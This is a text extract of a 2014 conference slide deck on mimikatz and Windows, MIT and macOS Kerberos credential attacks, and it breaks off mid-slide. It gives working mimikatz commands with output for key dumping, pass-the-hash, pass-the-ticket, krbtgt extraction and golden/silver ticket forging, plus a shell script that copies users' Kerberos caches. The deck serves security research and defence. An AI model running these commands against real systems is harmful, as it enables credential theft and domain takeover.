Uploaded byNoSuchCon
PDF, PPTX1,404 views

NSC #2 - D2 02 - Benjamin Delpy - Mimikatz

Benjamin Delpy is a security researcher known for creating the tool mimikatz. Mimikatz can extract plaintext credentials and keys from memory. Kerberos authentication relies on encrypting tickets with various keys, including NTLM hashes and AES keys derived from the password. Mimikatz can perform pass-the-hash and over-pass-the-hash attacks by extracting these keys from memory and using them to authenticate.

Embed presentation

Download as PDF, PPTX
mimikatz and your credentials ‘you’ll hate your SSO’ Benjamin DELPY `gentilkiwi`
`whoami` ? Benjamin DELPY - @gentilkiwi – Security researcher at night (it’s not my work) • A French guy with one flashy Tahitian shirt – Author of mimikatz • This little program that I wrote to learn C (and that your CISO hates) – Presented at Black Hat, Defcon, PHDays, BlueHat, and more • Despite, my excellent English, yeah – I’m: • Nice*, a kiwi – I’m not: • CISSP, CISA, OSCP, CHFI, CEH, ISO*, MCSA, CHFI, PASSI, […] *… 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 2
You see it every morning…
Or this one if you’re lucky…
Still probably a little bit this one :)
mimikatz :: sekurlsa LSA ( level) 14/03/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 6 LsaSSWinLogon Authentication Packages msv1_0 tspkg wdigest livessp kerberos Authentication msv1_0 kerberos SAM Challenge Response user:domain:password PLAYSKOOL
A little reminder about NTLM authentication 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 7 waza 1234/ NTLM (md4) LM cc36cf7a8514893e fccd332446158b1a d0e9aee149655a60 75e4540af1f22d3b LSASS (msv1_0) Domain Controller NTLM (md4) LM cc36cf7a8514893e fccd332446158b1a cc36cf7a8514893e fccd332446158b1a LSASS (msv1_0)
Normal NTLM authentication VS Pass-the-Hash know your enemy 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 8 Normal
A little reminder about Kerberos authentication How does it works ? 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 9 waza 1234/ des_cbc_md5 f8fd987fa7153185 LSASS (kerberos) rc4_hmac_nt (NTLM/md4) cc36cf7a8514893e fccd332446158b1a aes128_hmac 8451bb37aa6d7ce3 d2a5c2d24d317af3 aes256_hmac 1a7ddce7264573ae 1f498ff41614cc78 001cbf6e3142857c ce2566ce74a7f25b KDC KDC TGT TGS ③ TGS-REQ ④ TGS-REP ⑤ Usage Administrateur win10
A little reminder about Kerberos authentication The KDC will validate the authentication if it can decrypt the timestamp with the long-term user key (for RC4, the NTLM hash of the user password) It issues a TGT representing the user in the domain, for a specified period 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 10 RID : 000001f4 (500) User : Administrateur * Primary LM : NTLM : cc36cf7a8514893efccd332446158b1a * Kerberos-Newer-Keys Default Salt : LAB.LOCALAdministrateur Default Iterations : 4096 Credentials aes256_hmac (4096) : b7268361386090314acce8d9367e55f5 5865e7ef8e670fbe4262d6c94098a9e9 aes128_hmac (4096) : 8451bb37aa6d7ce3d2a5c2d24d317af3 des_cbc_md5 (4096) : f8fd987fa7153185 KDC waza 1234/ rc4_hmac_nt (NTLM/md4) cc36cf7a8514893e fccd332446158b1a 20140807054500Z timestamp ① AS-REQ ② AS-REPTGT
A little reminder about Kerberos authentication PAC (MS Specific) The KDC will create a Microsoft specific structure (PAC) with user information This PAC is signed with the target key, and the KDC key – for a TGT, the target is also the KDC, so it is the same key, 3f66b877d01affcc631f465e6e5ed449 for RC4 – KDC keys are in the krbtgt account 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 11 RID : 000001f6 (502) User : krbtgt * Primary LM : NTLM : 3f66b877d01affcc631f465e6e5ed449 * Kerberos-Newer-Keys Default Salt : LAB.LOCALkrbtgt Default Iterations : 4096 Credentials aes256_hmac (4096) : 15540cac73e94028231ef86631bc47bd 5c827847ade468d6f6f739eb00c68e42 aes128_hmac (4096) : da3128afc899a298b72d365bd753dbfb des_cbc_md5 (4096) : 620eb39e450e6776 KDC Username : Administrateur Domain SID S-1-5-21-130452501-2365100805- 3685010670 User ID 500 Administrateur Groups ID 512 Admins du domaine 519 Administrateurs de l’entreprise 518 Administrateurs du schéma … Authorization data Microsoft (PAC) CHECKSUM_SRV – HMAC_MD5 - krbtgt 3f66b877d01affcc631f465e6e5ed449 CHECKSUM_KDC – HMAC_MD5 - krbtgt 3f66b877d01affcc631f465e6e5ed449
A little reminder about Kerberos authentication TGT This TGT is encrypted with a key shared between all KDC – The RC4 key for the krbtgt account : 3f66b877d01affcc631f465e6e5ed449 The KDC adds the Microsoft specific PAC to a structure with user’s information 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 12 RID : 000001f6 (502) User : krbtgt * Primary LM : NTLM : 3f66b877d01affcc631f465e6e5ed449 * Kerberos-Newer-Keys Default Salt : LAB.LOCALkrbtgt Default Iterations : 4096 Credentials aes256_hmac (4096) : 15540cac73e94028231ef86631bc47bd 5c827847ade468d6f6f739eb00c68e42 aes128_hmac (4096) : da3128afc899a298b72d365bd753dbfb des_cbc_md5 (4096) : 620eb39e450e6776 KDC TGT Start/End/MaxRenew: 14/07/2014 00:46:09 ; 14/07/2014 10:46:09 ; 21/07/2014 00:46:09 Service Name (02) : krbtgt ; LAB.LOCAL ; @ LAB.LOCAL Target Name (02) : krbtgt ; LAB ; @ LAB.LOCAL Client Name (01) : Administrateur ; @ LAB.LOCAL ( LAB ) Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac f3bf2e0e26903703bec6259b400a586f403bbfe3771cb797 2be3c0868cb9cc69 RC4-HMAC – krbtgt 3f66b877d01affcc631f465e6e5ed449 Username : Administrateur Domain SID S-1-5-21-130452501-2365100805-3685010670 Authorization data Microsoft (PAC) CHECKSUM_SRV – HMAC_MD5 - krbtgt 310b643c5316c8c3c70a10cfb17e2e3 CHECKSUM_KDC – HMAC_MD5 - krbtgt 310b643c5316c8c3c70a10cfb17e2e3
Let’s play a game, Windows Kerberos
Windows Kerberos What can we do with multiple sessions in memory? 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 14 waza 1234/ des_cbc_md5 f8fd987fa7153185 LSASS (kerberos) rc4_hmac_nt (NTLM/md4) cc36cf7a8514893e fccd332446158b1a aes128_hmac 8451bb37aa6d7ce3 d2a5c2d24d317af3 aes256_hmac 1a7ddce7264573ae 1f498ff41614cc78 001cbf6e3142857c ce2566ce74a7f25b KDC KDC TGT TGS ③ TGS-REQ ④ TGS-REP ⑤ Usage Administrateur win10
Windows Kerberos Keys… 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 15 .#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Nov 17 2014 00:53:48) .## ^ ##. ## / ## /* * * ## / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 15 modules * * */ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::ekeys Authentication Id : 0 ; 142976 (00000000:00022e80) Session : Interactive from 1 User Name : Administrator Domain : LAB SID : S-1-5-21-2929287289-1204109396-1883388597-500 * Username : Administrator * Domain : LAB.LOCAL * Password : waza1234/ * Key List : aes256_hmac 1a7ddce7264573ae1f498ff41614cc78001cbf6e3142857cce2566ce74a7f25b aes128_hmac a62abee318bc8877b6d402bde49ddd61 rc4_hmac_nt cc36cf7a8514893efccd332446158b1a rc4_hmac_old cc36cf7a8514893efccd332446158b1a rc4_md4 cc36cf7a8514893efccd332446158b1a rc4_hmac_nt_exp cc36cf7a8514893efccd332446158b1a rc4_hmac_old_exp cc36cf7a8514893efccd332446158b1a
Windows Kerberos Overpass-the-hash With a RC4 key (NTLM hash !) 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 16 des_cbc_md5 LSASS (kerberos) rc4_hmac_nt (NTLM/md4) cc36cf7a8514893e fccd332446158b1a aes128_hmac aes256_hmac KDC KDC TGT TGS ③ TGS-REQ ④ TGS-REP ⑤ Usage cc36cf7a8514893e fccd332446158b1a
Windows Kerberos Overpass-the-hash With an AES key (linked to the password too) 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 17 des_cbc_md5 LSASS (kerberos) rc4_hmac_nt (NTLM/md4) aes128_hmac aes256_hmac KDC KDC TGT TGS ③ TGS-REQ ④ TGS-REP ⑤ Usage 1a7ddce7264573ae 1f498ff41614cc78 001cbf6e3142857c ce2566ce74a7f25b 1a7ddce7264573ae 1f498ff41614cc78 001cbf6e3142857c ce2566ce74a7f25b
Windows Kerberos Overpass-the-hash 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 18 mimikatz # sekurlsa::pth /user:Administrator /domain:LAB.LOCAL /rc4:cc36cf7a8514893efccd332446158b1a user : Administrator domain : LAB.LOCAL program : cmd.exe NTLM : cc36cf7a8514893efccd332446158b1a | PID 3632 | TID 3924 | LUID 0 ; 442172 (00000000:0006bf3c) _ msv1_0 - data copy @ 00B30F54 : OK ! _ kerberos - data copy @ 00BC5C18 _ aes256_hmac -> null _ aes128_hmac -> null _ rc4_hmac_nt OK _ rc4_hmac_old OK _ rc4_md4 OK _ rc4_hmac_nt_exp OK _ rc4_hmac_old_exp OK _ *Password replace -> null mimikatz # sekurlsa::pth /user:Administrator /domain:LAB.LOCAL /aes256:1a7ddce7264573ae1f498ff41614cc78001cbf6e3142857cce2566ce74a7f25b user : Administrator domain : LAB.LOCAL program : cmd.exe AES256 : 1a7ddce7264573ae1f498ff41614cc78001cbf6e3142857cce2566ce74a7f25b | PID 2120 | TID 2204 | LUID 0 ; 438984 (00000000:0006b2c8) _ msv1_0 - data copy @ 00B2936C : OK ! _ kerberos - data copy @ 00BC5A68 _ aes256_hmac OK _ aes128_hmac -> null _ rc4_hmac_nt -> null _ rc4_hmac_old -> null _ rc4_md4 -> null _ rc4_hmac_nt_exp -> null _ rc4_hmac_old_exp -> null _ *Password replace -> null
A little reminder about Kerberos authentication What else? 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 19 waza 1234/ des_cbc_md5 f8fd987fa7153185 LSASS (kerberos) rc4_hmac_nt (NTLM/md4) cc36cf7a8514893e fccd332446158b1a aes128_hmac 8451bb37aa6d7ce3 d2a5c2d24d317af3 aes256_hmac 1a7ddce7264573ae 1f498ff41614cc78 001cbf6e3142857c ce2566ce74a7f25b KDC KDC TGT TGS ③ TGS-REQ ④ TGS-REP ⑤ Usage Administrateur win10
A little reminder about Kerberos authentication Tickets… 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 20 mimikatz # sekurlsa::tickets /export Authentication Id : 0 ; 963494 (00000000:000eb3a6) Session : Interactive from 2 User Name : Administrator Domain : LAB SID : S-1-5-21-2929287289-1204109396-1883388597-500 […] Group 0 - Ticket Granting Service [00000000] Start/End/MaxRenew: 19/11/2014 03:00:52 ; 19/11/2014 13:00:12 ; 26/11/2014 03:00:12 Service Name (02) : cifs ; dc.lab.local ; @ LAB.LOCAL […] Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac 13d5f91632296f1d2bc658793ffc458f7abac80ef062aa908359f7eaa1f9b946 Ticket : 0x00000012 - aes256_hmac ; kvno = 3 [...] * Saved to file [0;eb3a6]-0-0-40a50000-Administrator@cifs-dc.lab.local.kirbi ! [00000001] Start/End/MaxRenew: 19/11/2014 03:00:13 ; 19/11/2014 13:00:12 ; 26/11/2014 03:00:12 Service Name (02) : ldap ; dc.lab.local ; @ LAB.LOCAL […] Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac e4a2150bec28971ce4100c21462c34cf194a0d896ef09caf8c126a397d11a4a0 Ticket : 0x00000012 - aes256_hmac ; kvno = 3 [...] * Saved to file [0;eb3a6]-0-1-40a50000-Administrator@ldap-dc.lab.local.kirbi ! Group 1 - Client Ticket ? Group 2 - Ticket Granting Ticket [00000000] Start/End/MaxRenew: 19/11/2014 03:00:12 ; 19/11/2014 13:00:12 ; 26/11/2014 03:00:12 Service Name (02) : krbtgt ; LAB.LOCAL ; @ LAB.LOCAL […] Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac 7f75a0085ce638ff7dc43c1ee11f8d478f8ff1e4c863769f95f390223cebdc1a Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...] * Saved to file [0;eb3a6]-2-1-40e10000-Administrator@krbtgt-LAB.LOCAL.kirbi !
Windows Kerberos Pass-the-ticket With TGT, to obtain some TGS… 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 21 des_cbc_md5 LSASS (kerberos) rc4_hmac_nt (NTLM/md4) aes128_hmac aes256_hmac KDC KDC TGT TGS ③ TGS-REQ ④ TGS-REP ⑤ Usage TGT
Windows Kerberos Pass-the-ticket With one TGS (or more…) 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 22 des_cbc_md5 LSASS (kerberos) rc4_hmac_nt (NTLM/md4) aes128_hmac aes256_hmac KDC KDC TGS ③ TGS-REQ ④ TGS-REP ⑤ Usage TGS
Windows Kerberos Pass-the-ticket 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 23 .#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Nov 17 2014 00:53:48) .## ^ ##. ## / ## /* * * ## / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 15 modules * * */ mimikatz # kerberos::ptt krbtgt.kirbi cifs.kirbi 0 - File 'krbtgt.kirbi' : OK 1 - File 'cifs.kirbi' : OK mimikatz # kerberos::list [00000000] - 0x00000012 - aes256_hmac Start/End/MaxRenew: 19/11/2014 03:00:12 ; 19/11/2014 13:00:12 ; 26/11/2014 03:00:12 Server Name : krbtgt/LAB.LOCAL @ LAB.LOCAL Client Name : Administrator @ LAB.LOCAL Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; [00000001] - 0x00000012 - aes256_hmac Start/End/MaxRenew: 19/11/2014 03:00:52 ; 19/11/2014 13:00:12 ; 26/11/2014 03:00:12 Server Name : cifs/dc.lab.local @ LAB.LOCAL Client Name : Administrator @ LAB.LOCAL Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; mimikatz # kerberos::ptt tickets 0 - Directory 'tickets' (*.kirbi) 0 - File '[0;eb3a6]-0-0-40a50000-Administrator@cifs-dc.lab.local.kirbi' : OK 1 - File '[0;eb3a6]-0-1-40a50000-Administrator@ldap-dc.lab.local.kirbi' : OK 2 - File '[0;eb3a6]-2-1-40e10000-Administrator@krbtgt-LAB.LOCAL.kirbi' : OK
Demo ! 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 24
Normal Kerberos VS Overpass-the-Hash/Pass-the-Ticket know your enemy 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 25 Normal
And now, I’m pretty sure you want some Golden Tickets?
Golden Ticket A “Golden Ticket”, is a homemade ticket –It’s done with a lot of love –… and a key It’s not made by the KDC, so : –it’s not limited by GPO or others settings ;) –you can push whatever you want inside! –it’s smartcard independent (sorry CISO !) A “Silver Ticket” is also a kind of Golden Ticket ;) 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 27
Golden Ticket The entire Kerberos security relies on poor little symmetric keys under “krbtgt” account – 128 bits for RC4/AES128 – 256 bits for AES256 And once generated, these keys never change for…. years… – Only changes during domain functional upgrade from NT5 -> NT6 – 2000/2003 to 2008/2012 • 2008 -> 2012 doesn’t change the value • the previous one (n-1) still valid… 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 28
Golden Ticket If krbtgt hash/keys lost – Domain dump • Password audit (legitimate use case) • Poorly redacted pentest report – yeah, really, this 502/krbtgt was a disabled account never used after all? – Other • Compromise File backup of the domain controller – Shadow copy trick – Recovery of backup tapes or access to backup file share Compromise of virtual machine infrastructure – Copy the drive image or a snapshot of the image 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 29
Golden Ticket You can get “krbtgt” keys on a DC with mimikatz or other tools 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 30 mimikatz # privilege::debug Privilege '20' OK mimikatz # lsadump::lsa /name:krbtgt /inject Domain : LAB / S-1-5-21-2929287289-1204109396-1883388597 RID : 000001f6 (502) User : krbtgt * Primary LM : NTLM : 3f66b877d01affcc631f465e6e5ed449 * WDigest 01 a68990164b4dfefa47c2e998f19eb74c […] 29 75af20f460c10096e5ce62527ffe9c96 * Kerberos Default Salt : LAB.LOCALkrbtgt Credentials des_cbc_md5 : 62b915a4a1629861 * Kerberos-Newer-Keys Default Salt : LAB.LOCALkrbtgt Default Iterations : 4096 Credentials aes256_hmac (4096) : 466d9a5b9bc33cbfd566d5ad7635aedf7442f10116a68051a27fb53bbba3a19f aes128_hmac (4096) : 6dcc65d95e6f00cbedb65cc0892a5085 des_cbc_md5 (4096) : 62b915a4a1629861
Golden Ticket From Will (@harmj0y): certainly a lab, certainly not a real life example, for sure… – https://twitter.com/harmj0y/status/520633805485654018 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 31
Golden Ticket Even Microsoft was a little bit curious about their own AD at our talk at BlueHat – https://twitter.com/JohnLaTwC/status/52106151 2203345920 Yeah, they have a funky monitoring… Btw, real command line is : – net user krbtgt /domain Do you know why MS don’t renew this account automatically ? or did not publish a recommendation to periodically renew krbtgt ? – In most cases, it works… – … most cases 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 32
Golden Ticket krbtgt hash can be used to generate arbitrary TGTs for use – Can make user a member of any group, even make it multiple users! • Even users and SIDs that do not exist – TGTs will only work for 20 minutes to get service tickets (however any service tickets will be good for 10 hours by default) • Any account can create / used spoofed ticket, doesn’t require elevated rights – Can be used to bypass account restrictions • Disabled / expired • Authentication silos • “protected users” group is just a group SID in the TGT – Create a trail of false events • Incident handlers rely on event logs • Easy to frame another user 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 33
mimikatz :: Golden Ticket kerberos::golden /domain:lab.local <= domain name /sid:S-1-5-21-2929287289-1204109396-1883388597 <= domain SID /rc4:3f66b877d01affcc631f465e6e5ed449 <= NTLM/RC4 of KRBTGT /user:Administrator <= username you wanna be /id:500 <= RID of username (500 is THE domain admin) /groups:513,512,520,518,519 <= Groups list of the user (be imaginative) /ticket:Administrator.lab.kirbi <= the ticket filename (or /ptt) 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 34
PAC Signature - BlackHat erratum At BlackHat/Defcon, Skip Duckwall and I announced that to forge a TGS, we need 2 keys – krbtgt key – target key The krbtgt is needed to sign the PAC, to avoid alterations – How a remote service can check a signature without the Key ? • Remember ? Kerberos is SYMETRIC – Easy: it delegates PAC checks to the KDC… 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 35
PAC Signature - MS014-68 Yes! Since 2 days you’ve heard about PAC signature check! w00t to Tom Maddock (@ubernerdom ?) for reporting a bug in PAC signature check (-1?) –Exploit guys, we need a POC ! This is not like a Golden Ticket – … or a Silver Ticket – MS014-68 rely on bug(s) in MS code… • Fixed in KB3011780 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 36
PAC Signature Windows 2000 Server and Windows XP do not validate the PAC when the application server is running under the local system context or has SeTcbPrivilege […] Windows Server 2003 does not validate the PAC when the application server is running under the local system context, the network service context, or has SeTcbPrivilege. […] Windows Server 2003 with SP1 does not validate the PAC when the application server is under the local system context, the network service context, the local service context, or has SeTcbPrivilege privilege. […] Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, Windows 8.1, and Windows Server 2012 R2 do not validate the PAC by default for services. Windows still validates the PAC for processes that are not running as services. PAC validation can be enabled when the application server is not running in the context of local system, network service, or local service; or it does not have SeTcbPrivilege […] 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 37 http://msdn.microsoft.com/library/cc224027.aspx#id2
mimikatz :: Ticket So “in real life”, TGS only need the target key… no classic services will check signature…, let’s call them : Silver Tickets ! 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 38 Default lifetime Minimum number of KDC accesses Multiple targets Available with Smartcard Realtime check for restrictions (account disabled, logon hours...) Protected Users Check for Encryption (RC4/AES) Can be found in Is funky Normal 42 days 2 Yes Yes Yes Yes n.a. No Overpass-the- hash (Pass-the-key) 42 days 2 Yes No Yes Yes Active Directory Client No (ok, a little;)) Pass-the-Ticket (TGT) 10 hours 1 Yes Yes No (20mn after) No Client Memory Yes Pass-the-Ticket (TGS) 10 hours 0 No Yes No No Client Memory Yes Silver Ticket [30;60] days 0 No Yes No No n.a. Yes Golden Ticket 10 years 1 Yes Yes No (we can cheat) No n.a. Fuck, Yes!
Silver Ticket How do we make a Silver Ticket ? – Exactly such as a Golden Ticket, except the krbtgt key – Target name (server FQDN) – Service name – We must have the “Target Key” • From Client Memory • From Active Directory (ok, we can make Golden Ticket ;) • or... from the registry (even, offline !) 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 39 mimikatz # lsadump::secrets Domain : CLIENT SysKey : 6bfd21f0eda0b20c96d902d3469909d6 Policy subsystem is : 1.13 LSA Key(s) : 1, default {adda624d-4d80-fbd7-1430-d1a54ddaa3ec} [00] {adda624d-4d80-fbd7-1430-d1a54ddaa3ec} e159ebc7330c153ca0def6705c5c3c9e963745c6a49bd0dbe93d426b71d1df6c Secret : $MACHINE.ACC cur/NTLM:c67d6f47929a19c574ee18539ae679f1/text:QbPxN=taXHczIGQ1u`]MG;HZjb]bDI^dbilGW?=up![Y_%:jrkFt*Ts19>'nE (]?XK8r-U#4sY_7KbeMBRn>+[7L7/ XHE1yeG?iaK@VTP_^34/,`kE6;z
Silver Ticket Before that, who cares about this computer password ? – No… really ? – Yeah, like for the krbtgt account – At least, this time the password can change every 30 days... • But the n-1 still valid (so [30;60 days])… and the password still works if not changed… $MACHINE.ACC is the new krbtgt, localized to a computer/server – And it’s in the registry Silver ticket is the new Golden Ticket, localized to a target/service When you use a Service Account linked to a Kerberized Service, it can be localized to multiple targets (see SPN) – A lot of chances that you can find it in registry too ;) 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 40
mimikatz :: Silver Ticket kerberos::golden /domain:lab.local <= domain name /sid:S-1-5-21-2929287289-1204109396-1883388597 <= domain SID /rc4:c67d6f47929a19c574ee18539ae679f1 <= NTLM/RC4 of the Target/Service /target:client.lab.local <= Target FQDN /service:cifs <= Service name /user:Administrator <= username you wanna be /id:500 <= RID of username (500 is THE domain admin) /groups:513,512,520,518,519 <= Groups list of the user (be imaginative) /ticket:cifs.client.kirbi <= the ticket filename (or /ptt) 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 41
Demo ! 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 42
Kerberos…. 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 43
Ubuntu Kerberos client (MIT) MIT client caches tickets in a file (one by user) -rw------- 1 gentilkiwi gentilkiwi 2740 nov. 19 23:45 krb5cc_1000 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 45
Ubuntu Kerberos client (MIT) By default, one user can access ALL its tickets –Windows forbids TGT (by default) root can copy all tickets (of course, why not?) – sudo cp /tmp/krb5cc_* /mnt/hgfs/vmshare/ubuntu/ 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 46
OSX Kerberos client (Heimdal) OSX can be joined in a domain, then access resources like Windows… – Tickets are not in a file like MIT by default (? and I don’t know Mac at all…?) 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 48
OSX Kerberos client (Heimdal) Like in Windows, local admins rule =) 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 49 #!/bin/sh DEST="/Volumes/VMware Shared Folders/vmshare/mac/`date +%Y%m%d%H%M%S`" mkdir -p "$DEST" ps auxwww | grep /loginwindow | grep -v "grep /loginwindow" | while read line do USER=`echo "$line" | awk '{print $1}'` PID=`echo "$line" | awk '{print $2}'` echo "$PID -> $USER" launchctl bsexec $PID kcc copy_cred_cache /tmp/$USER.$PID.ccache done cp /tmp/*.ccache "$DEST"
mimikatz & ccache files kerberos::clist [/export] - Can split ccache in multiple “kirbi” files – To use with Pass-the-ticket by example 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 50 mimikatz # kerberos::clist "vmware-hostShared Foldersvmsharemac20141120003301administrator.66.ccache" /export Principal : (01) : administrator ; @ LAB.LOCAL Data 0 Start/End/MaxRenew: 19/11/2014 23:56:35 ; 20/11/2014 09:56:35 ; 26/11/2014 23:56:35 Service Name (02) : krbtgt ; LAB.LOCAL ; @ LAB.LOCAL Target Name (02) : krbtgt ; LAB.LOCAL ; @ LAB.LOCAL Client Name (01) : administrator ; @ LAB.LOCAL Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac aa63ef63ce29151c2f696d837c63ad5ab82a851aeeccc8a1e69a4425473a8aaf Ticket : 0x00000000 - null ; kvno = 2 [...] * Saved to file 0-40e10000-administrator@krbtgt-LAB.LOCAL.kirbi ! Data 1 * X-CACHECONF: entry? * Data 2 Start/End/MaxRenew: 19/11/2014 23:57:44 ; 20/11/2014 09:56:35 ; 01/01/1970 01:00:00 Service Name (03) : cifs ; dc.lab.local ; @ LAB.LOCAL Target Name (03) : cifs ; dc.lab.local ; @ LAB.LOCAL Client Name (01) : administrator ; @ LAB.LOCAL Flags 40250000 : name_canonicalize ; ok_as_delegate ; pre_authent ; forwardable ; Session Key : 0x00000012 - aes256_hmac ef7fddb42d1513c65978f433ad61bcddd78e664b723e560833c6ed4d2df211e1 Ticket : 0x00000000 - null ; kvno = 2 [...] * Saved to file 2-40250000-administrator@cifs-dc.lab.local.kirbi ! Data 3 * X-CACHECONF: entry? *
mimikatz & ccache files kerberos::ptc - Can inject whole ccache in memory 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 51 mimikatz # kerberos::ptc "vmware-hostShared Foldersvmshareubuntukrb5cc_1000" Principal : (01) : Administrator ; @ LAB.LOCAL Data 0 Start/End/MaxRenew: 19/11/2014 23:42:20 ; 20/11/2014 09:42:20 ; 20/11/2014 23:42:17 Service Name (02) : krbtgt ; LAB.LOCAL ; @ LAB.LOCAL Target Name (02) : krbtgt ; LAB.LOCAL ; @ LAB.LOCAL Client Name (01) : Administrator ; @ LAB.LOCAL Flags 50e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; proxiable ; forwardable ; Session Key : 0x00000012 - aes256_hmac 0c688277c6e5d6bf2fe766aef402998d619e24f93d83f7738e1383688b7cfda3 Ticket : 0x00000000 - null ; kvno = 2 [...] * Injecting ticket : OK Data 1 * X-CACHECONF: entry? * Data 2 Start/End/MaxRenew: 19/11/2014 23:45:26 ; 20/11/2014 09:42:20 ; 20/11/2014 23:42:17 Service Name (01) : cifs ; dc.lab.local ; @ LAB.LOCAL Target Name (01) : cifs ; dc.lab.local ; @ LAB.LOCAL Client Name (01) : Administrator ; @ LAB.LOCAL Flags 50a50000 : name_canonicalize 